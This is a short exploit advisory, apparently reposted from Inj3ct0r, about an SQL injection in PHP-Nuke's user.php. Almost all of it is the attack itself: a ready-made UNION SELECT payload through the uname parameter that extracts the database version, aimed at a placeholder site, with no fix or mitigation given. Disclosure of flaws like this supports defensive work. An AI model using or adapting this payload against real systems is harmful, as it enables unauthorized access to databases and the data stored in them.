Home / os / winme

PHP-NUKE (user.php) SQL Injection Vulnerability

Posted on 04 March 2010

=============================================== PhP-Nuke (user.php) SQL Injection Vulnerability =============================================== ----------------------------Information------------------------------------------------ +Name : PhP-Nuke user.php SQL Injection +Autor : Easy Laster +Date : 04.03.2010 +Script : PhP-Nuke +Download : its a old version http://phpnuke.org/ +Price : 12,00$ +Language :PHP +Discovered by Easy Laster ---------------------------------------------------------------------------------------- +Vulnerability : http://www.site.com/phpnuke/user.php?op=userinfo&uname= +Exploitable : http://www.site.com/phpnuke/user.php?op=userinfo&uname='+union+select +1,2,version(),4,5,6,7,8,9,10,11,12,13--+ ----------------------------------------------------------------------------------------- # ~ - [ [ : Inj3ct0r : ] ]

 

TOP